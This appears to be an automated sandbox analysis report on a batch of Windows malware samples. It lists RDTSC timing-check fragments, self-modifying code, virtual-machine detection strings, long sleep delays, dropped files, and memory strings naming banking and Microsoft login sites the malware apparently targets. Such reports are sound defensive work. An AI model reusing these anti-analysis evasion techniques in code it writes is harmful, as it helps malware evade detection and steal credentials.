Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C828 second address: 102C82E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C82E second address: 102C834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C9A2 second address: 102C9A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C9A8 second address: 102C9B2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B648E95FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C9B2 second address: 102C9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3B64CCE616h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C9D1 second address: 102C9EB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3B648E95F8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 ja 00007F3B648E95F6h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C9EB second address: 102C9F5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3B64CCE60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102EBC9 second address: 102EBEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9605h 0x00000007 js 00007F3B648E9602h 0x0000000d jg 00007F3B648E95F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10345AC second address: 10345BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F3B64CCE606h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10345BA second address: 10345BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10345BE second address: 10345CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10345CA second address: 10345CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1033EE7 second address: 1033F0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B64CCE610h 0x00000008 jmp 00007F3B64CCE60Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3B64CCE613h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1033F0E second address: 1033F18 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B648E95F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10341B8 second address: 10341C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10386C3 second address: 10386D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F3B648E95FEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 103893A second address: 103896E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F3B64CCE612h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F3B64CCE619h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 103896E second address: 1038981 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 je 00007F3B648E95F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1038981 second address: 1038985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1038985 second address: 1038998 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B648E95F6h 0x00000008 jbe 00007F3B648E95F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1038998 second address: 10389A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10389A1 second address: 10389A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10389A8 second address: 10389AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1038DD2 second address: 1038E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F3B648E95F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3B648E9602h 0x00000011 push esi 0x00000012 jmp 00007F3B648E9603h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1038E06 second address: 1038E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 103DFCB second address: 103DFE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9603h 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 103CEE9 second address: 103CEEF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Special instruction interceptor: First address: 4FFE79 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Special instruction interceptor: First address: 4FFDB1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Special instruction interceptor: First address: 4FD30E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Special instruction interceptor: First address: 6D9946 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Special instruction interceptor: First address: 6BF6C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Special instruction interceptor: First address: 739E96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Special instruction interceptor: First address: 10866E9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Special instruction interceptor: First address: BF1A80 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Special instruction interceptor: First address: 9DDE13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Special instruction interceptor: First address: 9DB33A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Special instruction interceptor: First address: BAFC2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Special instruction interceptor: First address: B8FC59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Special instruction interceptor: First address: C13C71 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Special instruction interceptor: First address: 946B41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Special instruction interceptor: First address: 946A9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Special instruction interceptor: First address: AFA39B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Special instruction interceptor: First address: 946AA0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Special instruction interceptor: First address: B054D4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Special instruction interceptor: First address: B819DA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Special instruction interceptor: First address: 10EFBA3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Special instruction interceptor: First address: 10EFABA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Special instruction interceptor: First address: 129632B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Special instruction interceptor: First address: 12C27AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Special instruction interceptor: First address: 132297D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Special instruction interceptor: First address: 43B1D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Special instruction interceptor: First address: 5FFC8A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Special instruction interceptor: First address: 43DABA instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Memory allocated: 610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Memory allocated: 2520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Memory allocated: 4A30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Memory allocated: 4BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Memory allocated: 6BA0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 6040	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 3560	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4399
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5348
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Window / User API: threadDelayed 538

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\soft[1]	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\VF4D5GDAK1f2ev\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\VF4D5GDAK1f2ev\Y-Cleaner.exe	Jump to dropped file

Source: C:\Users\user\Desktop\random.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	API coverage: 2.0 %

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5876	Thread sleep count: 6040 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5876	Thread sleep time: -181200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5024	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5876	Thread sleep count: 3560 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5876	Thread sleep time: -106800000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe TID: 7068	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe TID: 6848	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe TID: 5764	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe TID: 6620	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe TID: 2540	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe TID: 7160	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe TID: 5056	Thread sleep count: 111 > 30
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe TID: 5056	Thread sleep count: 115 > 30
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe TID: 6672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe TID: 5412	Thread sleep count: 538 > 30
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe TID: 5412	Thread sleep count: 116 > 30

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\random.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009EEF71 FindFirstFileExW,	0_2_009EEF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B6EF71 FindFirstFileExW,	1_2_00B6EF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B6EF71 FindFirstFileExW,	2_2_00B6EF71

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009B93D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_009B93D0

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: 43a79b4335.exe, 00000013.00000002.2770927261.0000000001608000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW1Q
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: 186adf2617.exe, 00000011.00000002.2951076157.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000002.00000002.4582649780.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, 9f19f13091.exe, 00000006.00000002.2271472152.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, 9f19f13091.exe, 00000006.00000002.2271472152.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 5a20b6327b.exe, 0000000B.00000003.2445710305.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2455996825.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2409337791.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2385182968.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 186adf2617.exe, 00000011.00000003.2859332612.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2887654021.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000002.2955657135.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2678016226.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2815871726.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2744878384.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWa
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000010.00000002.2990506144.00000000049C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 43a79b4335.exe, 00000013.00000002.2770927261.00000000015AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 5a20b6327b.exe, 0000000B.00000002.2456692421.000000000068D000.00000040.00000001.01000000.0000000F.sdmp, 1e8e57d62a.exe, 0000000C.00000002.2647330901.0000000000FDC000.00000040.00000001.01000000.00000010.sdmp, dd662b5386.exe, 0000000E.00000002.2616133002.0000000000D7A000.00000040.00000001.01000000.00000011.sdmp, dbe8776a6a.exe, 0000000F.00000002.2719206888.0000000000B68000.00000040.00000001.01000000.00000012.sdmp, 186adf2617.exe, 00000011.00000000.2633796457.0000000000ADF000.00000080.00000001.01000000.00000013.sdmp, 186adf2617.exe, 00000011.00000002.2935299685.0000000000ADF000.00000040.00000001.01000000.00000013.sdmp, 186adf2617.exe, 00000011.00000003.2652107833.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, 43a79b4335.exe, 00000013.00000002.2767954304.0000000001274000.00000040.00000001.01000000.00000014.sdmp, 186adf2617.exe, 00000014.00000002.2969690821.0000000000ADF000.00000040.00000001.01000000.00000013.sdmp, 186adf2617.exe, 00000014.00000003.2779109464.00000000056D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 9f19f13091.exe, 00000006.00000002.2271472152.0000000000C87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 186adf2617.exe, 00000014.00000002.2987328586.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2944192388.00000000015EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0bc
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BitLockerToGo.exe, 00000012.00000002.3077094422.00000000005C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E48000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW=
Source: firefox.exe, 00000022.00000002.3093495815.0000020F79110000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dd662b5386.exe, 0000000E.00000002.2617426334.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, dbe8776a6a.exe, 0000000F.00000002.2719963012.0000000001412000.00000004.00000020.00020000.00000000.sdmp, 40c4d92e87.exe, 00000015.00000003.2779411934.0000000000E93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
